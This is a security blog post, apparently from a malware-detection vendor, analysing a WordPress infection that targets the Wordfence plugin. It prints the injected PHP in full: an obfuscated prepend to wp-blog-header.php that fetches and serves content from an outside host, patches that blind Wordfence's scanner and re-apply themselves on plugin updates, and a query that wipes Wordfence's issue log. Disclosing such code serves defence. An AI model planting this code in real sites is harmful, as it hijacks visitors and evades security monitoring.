Top

Wordfence Security Plugin

wordfence

We found new intresting malware that infected WordPress and Wordfence Security plugin. This malware filename is random numeric with php extension.

Unlink

When it just executed from remote GET Request, it remove itself at first. So it’s difficult know what happened on server and what case infection to WordPress and Wordfence.

wp-blog-header.php

It modifying WordPress wp-blog-header.php file and add more content to begin of file. It check where user is Website url and what extension of filename and then CURL download/Redirect it.

Url is BASE64 encoded: aHR0cDovL2RvbWZvcnVsdHJhZG9ycy5jb20vPw
BASE64_DECODE: http://domforultradors.com/

Source infected wp-blog-header.php

$e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);

if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) ||
    basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) ||
        (stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {

    $at = "base64_" . "decode";

    $ch = curl_init($at("aHR0cDovL2RvbWZvcnVsdHJhZG9ycy5jb20vPw==") . "92877f004477c5605f97f9c527d0ec60" . $p);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"])
    );

    if (isset($_SERVER["HTTP_USER_AGENT"]))
        curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);

    if (isset($_SERVER["HTTP_REFERER"]))
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

    $ci = "curl_ex" . "ec";

    $data = $ci($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

    if (strlen($data) > 255 && $code == 200) {
        echo $data; exit;
    } else if ($data && ($code == 301 || $code == 302)) {
        header("Location: " . trim($data), true, $code); exit;
    }
}

wfScanEngine.php

Next this malware trying modify wfScanEngine.php file:

Orginal

if (!is_array($this->knownFiles)) {
                                throw new wfScanKnownFilesException("Invalid response from Wordfence servers.");
}

Again it are more content begin of orginal content:

Modified

unset($this->knownFiles["core"]["wp-blog-header.php"], 
$this->knownFiles["core"][$file = "wp-admin/includes/class-wp-upgrader.php"], 
$this->knownFiles["plugins"]["wp-content/plugins/wordfence/lib/wfScanEngine.php"]); 
        
if (method_exists("wordfenceHash", "wfHash")) {
   $hash = @wordfenceHash::wfHash(ABSPATH . $file);
        
   if (count($hash) > 1 && strlen($hash[1]) > 12) {
      $this->knownFiles["core"][$file] = strtoupper($hash[1]);
   }
}
if (!is_array($this->knownFiles)) {
                                throw new wfScanKnownFilesException("Invalid response from Wordfence servers.");
}

WordPress class-wp-upgrader.php

Third modification is WordPress class-wp-upgrader.php file modification.

Orginal

//Bombard the calling function will all the info which we've just used.
return $this->result;

Modified

//Bombard the calling function will all the info which we've just used.
        
if ($destination_name == "wordfence" && ($data = file_get_contents($file = $destination . "lib/wfScanEngine.php"))) {
   $data = str_replace('if (!is_array($this->knownFiles))', 'unset($this->knownFiles["core"]["wp-blog-header.php"], 
   $this->knownFiles["core"][$file = "wp-admin/includes/class-wp-upgrader.php"], 
   $this->knownFiles["plugins"]["wp-content/plugins/wordfence/lib/wfScanEngine.php"]);
       
   if (method_exists("wordfenceHash", "wfHash")) {
      $hash = @wordfenceHash::wfHash(ABSPATH . $file);
      if (count($hash) > 1 && strlen($hash[1]) > 12) {
         $this->knownFiles["core"][$file] = strtoupper($hash[1]);
       }
   } 

if  (!is_array($this->knownFiles))', $data, $count);            
    if ($data && $count) {
       file_put_contents($file, $data);
    }
}
return  $this->result;;

Last modification to database

Final this malware try remove all wp_wfIssues logs from database.

mysqli_query(mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME),
    "delete from wp_wfIssues");

Final words

Websites that using Malware Expert – ModSecurity rules are protected against this kind of attacks.

Use Malware Expert – Signatures detect this malware from files for FREE!

, , ,

Comments are closed.